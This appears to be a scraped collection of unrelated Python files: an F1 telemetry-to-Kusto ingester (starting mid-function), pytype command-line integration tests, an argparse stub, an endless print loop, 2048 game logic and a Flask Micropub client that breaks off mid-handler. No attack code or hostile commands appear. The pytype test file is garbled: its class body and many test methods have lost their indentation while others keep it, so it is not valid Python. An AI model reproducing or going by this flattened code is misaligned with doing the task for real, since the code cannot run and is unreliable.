            carstatusdata.m_actualTyreCompound,
            carstatusdata.m_tyreVisualCompound,
            carstatusdata.m_tyresDamage[0],
            carstatusdata.m_tyresDamage[1],
            carstatusdata.m_tyresDamage[2],
            carstatusdata.m_tyresDamage[3],
            carstatusdata.m_frontLeftWingDamage,
            carstatusdata.m_frontRightWingDamage,
            carstatusdata.m_rearWingDamage,
            carstatusdata.m_engineDamage,
            carstatusdata.m_gearBoxDamage,
            carstatusdata.m_vehicleFiaFlags
        ]
        ingest_carstatusdataBuffer += ','.join(map(str, data))
        ingest_carstatusdataBuffer +="\n"
    if ingest_carstatusdataCnt == batch_freq_high:
        #print(ingest_carstatusdataBuffer)
        ingest_kusto("CarStatus", ingest_carstatusdataBuffer )
        ingest_carstatusdataBuffer=""
        ingest_carstatusdataCnt=0
    else:
        ingest_carstatusdataCnt+=1
if __name__ == '__main__':
    # Entry point: pull decoded UDP packets from the game and dispatch each
    # one to the matching ingest_* helper based on its packet type id.
    print("Server started on 20777")
    for packet, theader, m_header, player in get_telemetry():
        #print(theader, packet)
        if theader == 0: #PacketMotionData
            # Motion packets are currently ignored; the string below is a
            # no-op placeholder kept from the original (not a comment).
            """ print(theader, packet.m_wheelSpeed[0], packet.m_wheelSpeed[1],
            packet.m_wheelSpeed[2], packet.m_wheelSpeed[3])
            """
        elif theader == 1: #PacketSessionData
            ingest_sessiondata(packet, m_header)
        elif theader == 2:  # PacketLapData
            ingest_lapdata(packet, m_header)
        elif theader == 3:  # event packet: only logged, not ingested
            print(dir(packet.m_eventStringCode))
            print(theader, "Event ID: ", packet.m_eventStringCode._type_)
        elif theader == 4:  # PacketParticipantsData
            #print("ID: ", theader)
            ingest_participantdata(packet,m_header)
        elif theader == 5:
            # Car-setup packets are ignored; placeholder string kept as-is.
            """ for setupdata in packet.m_carSetups:
            print(theader, "Front Wing: ", setupdata.m_frontWing,
            "Rear Wing: ", setupdata.m_rearWing,
            "Differential on throttle: ", setupdata.m_onThrottle,
            "Differential off throttle: ", setupdata.m_offThrottle,
            "Front camber: ", setupdata.m_frontCamber,
            "Rear camber: ", setupdata.m_rearCamber,
            "Front toe: ", setupdata.m_frontToe,
            "Rear toe: ", setupdata.m_rearToe,
            "Front suspension: ", setupdata.m_frontSuspension,
            "Rear suspension: ", setupdata.m_rearSuspension,
            "Front bar: ", setupdata.m_frontAntiRollBar,
            "Rear bar: ", setupdata.m_rearAntiRollBar,
            "Front height: ", setupdata.m_frontSuspensionHeight,
            "Rear height: ", setupdata.m_rearSuspensionHeight,
            "Brake pressure (%): ", setupdata.m_brakePressure,
            "Brake bias (%): ", setupdata.m_brakeBias,
            "Front tyre (PSI): ", setupdata.m_frontTyrePressure,
            "Rear tyre (PSI): ", setupdata.m_rearTyrePressure,
            "Ballast: ", setupdata.m_ballast,
            "Fuel Load: ", setupdata.m_fuelLoad)
            """
        elif theader == 6:  # PacketCarTelemetryData
            ingest_cartelemetrydata(packet, m_header)
        elif theader == 7:  # PacketCarStatusData
            ingest_carstatusdata(packet, m_header)
|
nilq/baby-python
|
python
|
"""Integration test for pytype."""
from __future__ import print_function
import csv
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap
from pytype import config
from pytype import main as main_module
from pytype import utils
from pytype.pyi import parser
from pytype.pytd import pytd_utils
from pytype.pytd import typeshed
from pytype.pytd.parse import builtins
from pytype.tests import test_base
import unittest
class PytypeTest(unittest.TestCase):
"""Integration test for pytype."""
PYTHON_VERSION = (2, 7)
DEFAULT_PYI = builtins.DEFAULT_SRC
INCLUDE = object()
@classmethod
def setUpClass(cls):
    """Locate the pytype package root once for the whole test class."""
    super(PytypeTest, cls).setUpClass()
    # Two levels above pyi/parser.py is the pytype package directory.
    cls.pytype_dir = os.path.dirname(os.path.dirname(parser.__file__))
def setUp(self):
    """Reset the argument dict and create a fresh temp dir per test."""
    super(PytypeTest, self).setUp()
    self._ResetPytypeArgs()
    self.tmp_dir = tempfile.mkdtemp()
    # Default location for --output-errors-csv in the helpers below.
    self.errors_csv = os.path.join(self.tmp_dir, "errors.csv")
def tearDown(self):
    """Remove the per-test temporary directory and its artifacts."""
    super(PytypeTest, self).tearDown()
    shutil.rmtree(self.tmp_dir)
def _ResetPytypeArgs(self):
    """Reset self.pytype_args to the baseline flags every invocation needs."""
    self.pytype_args = {
        "--python_version": utils.format_version(self.PYTHON_VERSION),
        "--verbosity": 1
    }
def _DataPath(self, filename):
    """Resolve *filename* against the test_data tree; tmp_dir paths pass through unchanged."""
    in_tmp_dir = os.path.dirname(filename) == self.tmp_dir
    return filename if in_tmp_dir else os.path.join(self.pytype_dir, "test_data/", filename)
def _TmpPath(self, filename):
    """Return *filename* joined under this test's private temporary directory."""
    return os.path.join(self.tmp_dir, filename)
def _MakePyFile(self, contents):
    """Write Python source to a temp .py file, adding the annotations import when backported."""
    if utils.USE_ANNOTATIONS_BACKPORT:
        contents = test_base.WithAnnotationsImport(contents)
    return self._MakeFile(contents, extension=".py")
def _MakeFile(self, contents, extension):
    """Write dedented *contents* to a content-addressed temp file and return its path.

    The MD5 of the contents names the file, so identical sources share a path.
    """
    text = textwrap.dedent(contents)
    digest = hashlib.md5(text.encode("utf-8")).hexdigest()
    path = self._TmpPath(digest + extension)
    with open(path, "w") as f:
        print(text, file=f)
    return path
def _RunPytype(self, pytype_args_dict):
    """A single command-line call to the pytype binary.

    Typically you'll want to use _CheckTypesAndErrors or
    _InferTypesAndCheckErrors, which will set up the command-line arguments
    properly and check that the errors file is in the right state after the
    call. (The errors check is bundled in to avoid the user forgetting to call
    assertHasErrors() with no arguments when expecting no errors.)

    Side effects: sets self.stdout, self.stderr and self.returncode from the
    subprocess for later assertions.

    Args:
      pytype_args_dict: A dictionary of the arguments to pass to pytype, minus
        the binary name. For example, to run
          pytype simple.py --output=-
        the arguments should be {"simple.py": self.INCLUDE, "--output": "-"}
    """
    pytype_exe = os.path.join(self.pytype_dir, "pytype")
    pytype_args = [pytype_exe]
    for arg, value in pytype_args_dict.items():
        # INCLUDE is a sentinel meaning "pass the key as a bare argument";
        # any other value is attached as --flag=value.
        if value is not self.INCLUDE:
            arg += "=" + str(value)
        pytype_args.append(arg)
    p = subprocess.Popen(
        pytype_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    self.stdout, self.stderr = (s.decode("utf-8") for s in p.communicate())
    self.returncode = p.returncode
def _ParseString(self, string):
    """A wrapper for parser.parse_string that inserts the python version."""
    return parser.parse_string(string, python_version=self.PYTHON_VERSION)
def _GenerateBuiltinsTwice(self, python_version):
    """Run --generate-builtins twice and return both pickle paths.

    PYTHONHASHSEED is pinned to 0 so both runs should produce identical
    pickles; callers compare them with assertBuiltinsPickleEqual.
    """
    os.environ["PYTHONHASHSEED"] = "0"
    f1 = self._TmpPath("builtins1.pickle")
    f2 = self._TmpPath("builtins2.pickle")
    for f in (f1, f2):
        self.pytype_args["--generate-builtins"] = f
        self.pytype_args["--python_version"] = python_version
        self._RunPytype(self.pytype_args)
    return f1, f2
def assertBuiltinsPickleEqual(self, f1, f2):
    """Assert two builtins pickles are byte-identical; on mismatch, show a semantic diff."""
    with open(f1, "rb") as pickle1, open(f2, "rb") as pickle2:
        if pickle1.read() == pickle2.read():
            return
    # Bytes differ: load both and report which named pickles actually diverge.
    out1 = pytd_utils.LoadPickle(f1, compress=True)
    out2 = pytd_utils.LoadPickle(f2, compress=True)
    raise AssertionError("\n".join(pytd_utils.DiffNamedPickles(out1, out2)))
def assertOutputStateMatches(self, **has_output):
    """Check that the output state matches expectations.

    If, for example, you expect the program to print something to stdout and
    nothing to stderr before exiting with an error code, you would write
    assertOutputStateMatches(stdout=True, stderr=False, returncode=True).

    Args:
      **has_output: Whether each output type (stdout/stderr/returncode)
        should be truthy.  All three keys must be supplied.
    """
    output_types = {"stdout", "stderr", "returncode"}
    assert len(output_types) == len(has_output)
    for output_type in output_types:
        output_value = getattr(self, output_type)
        if has_output[output_type]:
            self.assertTrue(output_value, output_type + " unexpectedly empty")
        else:
            # Truncate long unexpected output so the failure message stays readable.
            value = str(output_value)
            if len(value) > 50:
                value = value[:47] + "..."
            self.assertFalse(
                output_value, "Unexpected output to %s: %r" % (output_type, value))
def assertHasErrors(self, *expected_errors):
    """Assert the errors CSV contains exactly *expected_errors*, in order.

    Each expected error is the error-class name (column 2 of the CSV).  On
    failure the full CSV is echoed to stderr for debugging.
    """
    with open(self.errors_csv, "r") as f:
        errors = list(csv.reader(f, delimiter=","))
    num, expected_num = len(errors), len(expected_errors)
    try:
        self.assertEqual(num, expected_num,
                         "Expected %d errors, got %d" % (expected_num, num))
        for error, expected_error in zip(errors, expected_errors):
            self.assertEqual(expected_error, error[2],
                             "Expected %r, got %r" % (expected_error, error[2]))
    except:
        print("\n".join(" | ".join(error) for error in errors), file=sys.stderr)
        raise
def _SetUpChecking(self, filename):
    """Configure pytype_args to run --check over *filename*."""
    self.pytype_args[self._DataPath(filename)] = self.INCLUDE
    self.pytype_args["--check"] = self.INCLUDE
def _CheckTypesAndErrors(self, filename, expected_errors):
    """Run pytype --check on *filename* and assert exactly *expected_errors* are reported."""
    self._SetUpChecking(filename)
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    # Errors go to the CSV, so the process itself should be silent and succeed.
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertHasErrors(*expected_errors)
def _InferTypesAndCheckErrors(self, filename, expected_errors):
    """Run pytype inference on *filename* (pyi to stdout) and check reported errors."""
    self.pytype_args[self._DataPath(filename)] = self.INCLUDE
    self.pytype_args["--output"] = "-"
    self.pytype_args["--output-errors-csv"] = self.errors_csv
    self._RunPytype(self.pytype_args)
    # The inferred pyi is written to stdout; errors go to the CSV only.
    self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
    self.assertHasErrors(*expected_errors)
def assertInferredPyiEquals(self, expected_pyi=None, filename=None):
    """Assert the pyi on self.stdout matches the expectation (AST comparison).

    Exactly one of *expected_pyi* (a pyi string) or *filename* (a test_data
    file containing the pyi) must be given.
    """
    assert bool(expected_pyi) != bool(filename)
    if filename:
        with open(self._DataPath(filename), "r") as f:
            expected_pyi = f.read()
    message = ("\n==Expected pyi==\n" + expected_pyi +
               "\n==Actual pyi==\n" + self.stdout)
    # Compare parsed ASTs rather than text so formatting differences don't matter.
    self.assertTrue(self._ParseString(self.stdout).ASTeq(
        self._ParseString(expected_pyi)), message)
def GeneratePickledSimpleFile(self, pickle_name, verify_pickle=True):
    """Pickle-infer test_data/simple.py into tmp_dir and return the pickle path.

    @param pickle_name: file name for the pickle inside tmp_dir.
    @param verify_pickle: when True, pass --verify-pickle so pytype re-loads
        the pickle to confirm it round-trips.
    """
    pickled_location = os.path.join(self.tmp_dir, pickle_name)
    self.pytype_args["--pythonpath"] = self.tmp_dir
    self.pytype_args["--pickle-output"] = self.INCLUDE
    self.pytype_args["--module-name"] = "simple"
    if verify_pickle:
        self.pytype_args["--verify-pickle"] = self.INCLUDE
    self.pytype_args["--output"] = pickled_location
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    # NOTE(review): returncode=0 relies on 0 being falsy in
    # assertOutputStateMatches; the sibling helpers pass False — consider
    # normalising.
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=0)
    self.assertTrue(os.path.exists(pickled_location))
    return pickled_location
def testPickledFileStableness(self):
# Tests that the pickled format is stable under a constant PYTHONHASHSEED.
l_1 = self.GeneratePickledSimpleFile("simple1.pickled")
l_2 = self.GeneratePickledSimpleFile("simple2.pickled")
with open(l_1, "rb") as f_1:
with open(l_2, "rb") as f_2:
self.assertEqual(f_1.read(), f_2.read())
def testGeneratePickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=True)
def testGenerateUnverifiedPickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=False)
def testPickleNoOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPickleBadOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args["--output"] = os.path.join(self.tmp_dir, "simple.pyi")
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadVerifyPickle(self):
self.pytype_args["--verify-pickle"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testNonexistentOption(self):
self.pytype_args["--rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCfgTypegraphConflict(self):
self._SetUpChecking("simple.py")
output_path = self._TmpPath("simple.svg")
self.pytype_args["--output-cfg"] = output_path
self.pytype_args["--output-typegraph"] = output_path
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict2(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["input.py:output.pyi"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testInputOutputPair(self):
self.pytype_args[self._DataPath("simple.py") +":-"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(filename="simple.pyi")
def testMultipleOutput(self):
self.pytype_args["input.py:output1.pyi"] = self.INCLUDE
self.pytype_args["--output"] = "output2.pyi"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsInputConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["input.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPythonpathConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["--pythonpath"] = "foo:bar"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPy2(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testGenerateBuiltinsPy3(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self.pytype_args["--python_version"] = "3.6"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testMissingInput(self):
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testMultipleInput(self):
self.pytype_args["input1.py"] = self.INCLUDE
self.pytype_args["input2.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadInputFormat(self):
self.pytype_args["input.py:output.pyi:rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPytypeErrors(self):
self._SetUpChecking("bad.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testPytypeErrorsCsv(self):
self._SetUpChecking("bad.py")
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertHasErrors("unsupported-operands", "name-error")
def testPytypeErrorsNoReport(self):
self._SetUpChecking("bad.py")
self.pytype_args["--no-report-errors"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testPytypeReturnSuccess(self):
self._SetUpChecking("bad.py")
self.pytype_args["--return-success"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=False)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testCompilerError(self):
self._CheckTypesAndErrors("syntax.py", ["python-compiler-error"])
def testMultiLineStringTokenError(self):
self._CheckTypesAndErrors("tokenerror1.py", ["python-compiler-error"])
def testMultiLineStatementTokenError(self):
self._CheckTypesAndErrors("tokenerror2.py", ["python-compiler-error"])
def testComplex(self):
self._CheckTypesAndErrors("complex.py", [])
def testCheck(self):
self._CheckTypesAndErrors("simple.py", [])
def testReturnType(self):
self._CheckTypesAndErrors(self._MakePyFile("""\
def f() -> int:
return "foo"
"""), ["bad-return-type"])
def testUsageError(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
pass
"""))
# Set up a python version mismatch
self.pytype_args["--python_version"] = "3.4"
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testSkipFile(self):
filename = self._MakePyFile("""\
# pytype: skip-file
""")
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInfer(self):
self._InferTypesAndCheckErrors("simple.py", [])
self.assertInferredPyiEquals(filename="simple.pyi")
def testInferPytypeErrors(self):
self._InferTypesAndCheckErrors(
"bad.py", ["unsupported-operands", "name-error"])
self.assertInferredPyiEquals(filename="bad.pyi")
def testInferCompilerError(self):
self._InferTypesAndCheckErrors("syntax.py", ["python-compiler-error"])
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInferComplex(self):
self._InferTypesAndCheckErrors("complex.py", [])
self.assertInferredPyiEquals(filename="complex.pyi")
def testCheckMain(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
name_error
def g():
"".foobar
g()
"""))
self.pytype_args["--main"] = self.INCLUDE
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertHasErrors("attribute-error")
  def testInferToFile(self):
    """--output writes the inferred pyi to the given file path."""
    self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
    pyi_file = self._TmpPath("simple.pyi")
    self.pytype_args["--output"] = pyi_file
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    # Compare the written pyi against the golden file as parsed ASTs,
    # not as raw text, so formatting differences don't matter.
    with open(pyi_file, "r") as f:
      pyi = f.read()
    with open(self._DataPath("simple.pyi"), "r") as f:
      expected_pyi = f.read()
    self.assertTrue(self._ParseString(pyi).ASTeq(
        self._ParseString(expected_pyi)))
  def testParsePyi(self):
    """--parse-pyi accepts a well-formed pyi file without errors."""
    self.pytype_args[self._DataPath("complex.pyi")] = self.INCLUDE
    self.pytype_args["--parse-pyi"] = self.INCLUDE
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
  def testPytree(self):
    """Test pytype on a real-world program."""
    # --quick trades analysis depth for speed on this larger input.
    self.pytype_args["--quick"] = self.INCLUDE
    self._InferTypesAndCheckErrors("pytree.py", [
        "import-error", "import-error", "attribute-error", "attribute-error",
        "attribute-error", "name-error"])
    # The inferred pyi (captured on stdout) must cover pytree's API surface.
    ast = self._ParseString(self.stdout)
    self.assertListEqual(["convert", "generate_matches", "type_repr"],
                         [f.name for f in ast.functions])
    self.assertListEqual(
        ["Base", "BasePattern", "Leaf", "LeafPattern", "NegatedPattern", "Node",
         "NodePattern", "WildcardPattern"],
        [c.name for c in ast.classes])
  def testNoAnalyzeAnnotated(self):
    """By default, bodies of fully annotated functions are not re-analyzed."""
    filename = self._MakePyFile("""\
      def f() -> str:
        return 42
      """)
    self._InferTypesAndCheckErrors(self._DataPath(filename), [])
  def testAnalyzeAnnotated(self):
    """--analyze-annotated re-checks annotated bodies, catching the bad return."""
    filename = self._MakePyFile("""\
      def f() -> str:
        return 42
      """)
    self.pytype_args["--analyze-annotated"] = self.INCLUDE
    self._InferTypesAndCheckErrors(self._DataPath(filename),
                                   ["bad-return-type"])
  def testRunPytype(self):
    """Basic unit test (smoke test) for _run_pytype."""
    # TODO(kramm): This is a unit test, whereas all other tests in this file
    # are integration tests. Move this somewhere else?
    infile = self._TmpPath("input")
    outfile = self._TmpPath("output")
    with open(infile, "w") as f:
      f.write("def f(x): pass")
    argv = ["-o", outfile, infile]
    options = config.Options(argv)
    main_module._run_pytype(options)
    # Only observable effect asserted on: the output pyi file was written.
    self.assertTrue(os.path.isfile(outfile))
  def testGenerateAndUseBuiltins(self):
    """Test for --generate-builtins."""
    filename = self._TmpPath("builtins.pickle")
    # Generate builtins pickle
    self.pytype_args["--generate-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertTrue(os.path.isfile(filename))
    src = self._MakePyFile("""\
      import __future__
      import sys
      import collections
      import typing
      """)
    # Use builtins pickle
    # The second run must type-check cleanly using the precompiled builtins.
    self._ResetPytypeArgs()
    self._SetUpChecking(src)
    self.pytype_args["--precompiled-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
  def testUseBuiltinsAndImportMap(self):
    """Test for --generate-builtins."""
    filename = self._TmpPath("builtins.pickle")
    # Generate builtins pickle
    self.pytype_args["--generate-builtins"] = filename
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
    self.assertTrue(os.path.isfile(filename))
    # input files
    canary = "import pytypecanary" if typeshed.Typeshed.MISSING_FILE else ""
    src = self._MakePyFile("""\
      import __future__
      import sys
      import collections
      import typing
      import foo
      import csv
      import ctypes
      import xml.etree.ElementTree as ElementTree
      import md5
      %s
      x = foo.x
      y = csv.writer
      z = md5.new
      """ % canary)
    pyi = self._MakeFile("""\
      import datetime
      x = ... # type: datetime.tzinfo
      """, extension=".pyi")
    # Use builtins pickle with an imports map
    # The imports map resolves 'foo' to the pyi above and masks 'typing'.
    self._ResetPytypeArgs()
    self._SetUpChecking(src)
    self.pytype_args["--precompiled-builtins"] = filename
    self.pytype_args["--imports_info"] = self._MakeFile("""\
      typing /dev/null
      foo %s
      """ % pyi, extension="")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
  def testBuiltinsDeterminism2(self):
    """Generating builtins twice for Python 2.7 yields identical pickles."""
    f1, f2 = self._GenerateBuiltinsTwice("2.7")
    self.assertBuiltinsPickleEqual(f1, f2)
  def testBuiltinsDeterminism3(self):
    """Generating builtins twice for Python 3.6 yields identical pickles."""
    f1, f2 = self._GenerateBuiltinsTwice("3.6")
    self.assertBuiltinsPickleEqual(f1, f2)
  def testTimeout(self):
    """--timeout aborts a long-running invocation with a failure returncode."""
    # Note: At the time of this writing, pickling builtins takes well over one
    # second (~10s). If it ever was to get faster, this test would become flaky.
    self.pytype_args["--timeout"] = 1
    self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.pickle")
    self._RunPytype(self.pytype_args)
    self.assertOutputStateMatches(stdout=False, stderr=False, returncode=True)
def main():
  """Entry point: delegate to the unittest runner."""
  unittest.main()
# Run the test suite when executed as a script.
if __name__ == "__main__":
  main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import argparse
def main(args):
    """Echo the parsed command-line namespace to stdout."""
    print(args)
def sub_function():
    """Placeholder helper; intentionally performs no work."""
    return None
def parse_arguments():
    """Parse command-line flags from sys.argv.

    Returns:
        argparse.Namespace with a single ``type`` attribute
        (``-t``/``--type``; defaults to False when the flag is absent).
    """
    parser = argparse.ArgumentParser(description="")
    parser.add_argument("-t", "--type", default=False)
    return parser.parse_args()
# Script entry point: parse CLI flags, then run main.
if __name__ == "__main__":
    args = parse_arguments()
    main(args)
|
nilq/baby-python
|
python
|
# NOTE(review): intentional infinite loop — this script never terminates
# and must be stopped with Ctrl-C.
while (True):
    print("mohammed uddin made changes")
    print(":D")
|
nilq/baby-python
|
python
|
# logic.py to be
import random
global actual_score
def start_game():
    """Create a fresh 4x4 board of zeros, seeded with a single '2' tile.

    Returns:
        The new grid as a list of four 4-element rows.
    """
    board = [[0] * 4 for _ in range(4)]
    # Every game begins with one tile already on the board.
    add_new_2(board)
    return board
def add_new_2(mat):
    """Place a new '2' tile on a uniformly chosen empty cell of *mat*.

    The original implementation used rejection sampling with a 50-try cap
    (and a bitwise ``&`` where a logical ``and`` was intended), which could
    fail to place a tile even when empty cells existed.  Enumerating the
    empty cells and choosing one directly always succeeds when any empty
    cell exists; a full board is returned unchanged.

    Args:
        mat: 4x4 list-of-lists grid; mutated in place.

    Returns:
        The same grid object, for call chaining.
    """
    empty_cells = [(r, c) for r in range(4) for c in range(4) if mat[r][c] == 0]
    if empty_cells:
        r, c = random.choice(empty_cells)
        mat[r][c] = 2
    return mat
def get_current_state(mat):
    """Classify the board state.

    Returns:
        'WON' if any tile is 2048, 'GAME NOT OVER' if a move is still
        possible (an empty cell or a mergeable adjacent pair exists),
        otherwise 'LOST'.
    """
    cells = [mat[i][j] for i in range(4) for j in range(4)]
    # A 2048 tile anywhere means victory.
    if 2048 in cells:
        return 'WON'
    # Any empty cell means a tile can still be placed/moved.
    if 0 in cells:
        return 'GAME NOT OVER'
    # Board is full: the game continues only if some horizontally or
    # vertically adjacent pair holds equal values and could merge.
    for a in range(4):
        for b in range(3):
            if mat[a][b] == mat[a][b + 1] or mat[b][a] == mat[b + 1][a]:
                return 'GAME NOT OVER'
    return 'LOST'
def compress(mat):
    """Slide all non-zero tiles of each row to the left edge.

    Args:
        mat: 4x4 grid (not modified).

    Returns:
        (new_mat, changed) — a new grid with each row's non-zero values
        packed left and zero-padded, and a flag that is True iff any
        tile ended up in a different column.
    """
    moved = False
    result = []
    for row in mat:
        tiles = [value for value in row if value != 0]
        packed = tiles + [0] * (4 - len(tiles))
        # A tile moved exactly when packing rearranged the row.
        if packed != row:
            moved = True
        result.append(packed)
    return result, moved
def merge(mat):
    """Combine equal horizontally adjacent tiles (left tile doubles, right zeroed).

    Mutates *mat* in place, scanning each row left to right so a tile
    created by a merge is not merged again in the same pass.

    Returns:
        (mat, changed, score) — the mutated grid, whether any merge
        happened, and the sum of all newly created tile values.
    """
    changed = False
    score = 0
    for row in mat:
        for col in range(3):
            value = row[col]
            if value != 0 and value == row[col + 1]:
                row[col] = 2 * value
                row[col + 1] = 0
                score += 2 * value
                changed = True
    return mat, changed, score
def reverse(mat):
    """Return a new grid with every row's order flipped (left-right mirror)."""
    return [row[::-1] for row in mat]
def transpose(mat):
    """Return a new grid with rows and columns interchanged."""
    return [list(column) for column in zip(*mat)]
def move_left(grid):
    """Perform a full left swipe: pack, merge, then pack again.

    Returns:
        (new_grid, changed, score) — *changed* is True iff the swipe
        altered the board; *score* is the merge score for this move.
    """
    packed, tiles_moved = compress(grid)
    merged, tiles_combined, score = merge(packed)
    # A second pack closes the gaps left behind by merged tiles.
    final_grid, _ = compress(merged)
    return final_grid, tiles_moved or tiles_combined, score
def move_right(grid):
    """Perform a right swipe by mirroring, swiping left, and mirroring back."""
    mirrored = reverse(grid)
    moved, changed, score = move_left(mirrored)
    return reverse(moved), changed, score
def move_up(grid):
    """Perform an upward swipe via transpose, left swipe, transpose back."""
    rotated = transpose(grid)
    moved, changed, score = move_left(rotated)
    return transpose(moved), changed, score
def move_down(grid):
    """Perform a downward swipe via transpose, right swipe, transpose back."""
    rotated = transpose(grid)
    moved, changed, score = move_right(rotated)
    return transpose(moved), changed, score
# this file only contains all the logic
# functions to be called in main function
# present in the other file
|
nilq/baby-python
|
python
|
import os
from flask import request, render_template, redirect, session, Blueprint, flash, jsonify, abort, send_from_directory
from werkzeug.utils import secure_filename
import indieweb_utils
from bs4 import BeautifulSoup
import requests
from config import ENDPOINT_URL, TWITTER_BEARER_TOKEN, UPLOAD_FOLDER, MEDIA_ENDPOINT_URL, CLIENT_ID
client = Blueprint("client", __name__, static_folder="static", static_url_path="")
@client.route("/", methods=["GET", "POST"])
def index():
    """Dashboard / landing page.

    GET: renders the dashboard for a signed-in user, otherwise the public
    home page.  POST (signed-in only): dispatches the "update", "delete"
    or "undelete" action for the submitted post URL against the Micropub
    endpoint, enforcing the matching token scope.

    Fix: the delete branch previously flashed the "update posts"
    permission message; it now names the delete permission.
    """
    if session.get("access_token"):
        user = session["access_token"]
        me = session["me"]
    else:
        user = None
        me = None
    if request.method == "POST":
        if user:
            url = request.form["url"]
            if request.form["action"] == "update":
                return redirect(f"/update?url={url}")
            elif request.form["action"] == "delete":
                # The token must carry the "delete" scope.
                if session.get("scope") and not "delete" in session.get("scope").split(" "):
                    flash("You do not have permission to delete posts.")
                    return redirect("/")
                http_request = requests.post(
                    ENDPOINT_URL,
                    json={
                        "type": ["h-entry"],
                        "action": "delete",
                        "url": url
                    },
                    headers={
                        "Authorization": f"Bearer {user}"
                    }
                )
                if http_request.status_code == 200 or http_request.status_code == 201:
                    flash(f"Your {url} post was successfully deleted.")
                else:
                    flash(http_request.json()["message"].strip("."))
                return render_template("user/dashboard.html", user=user, me=me, title="WriteIt Home", action="delete")
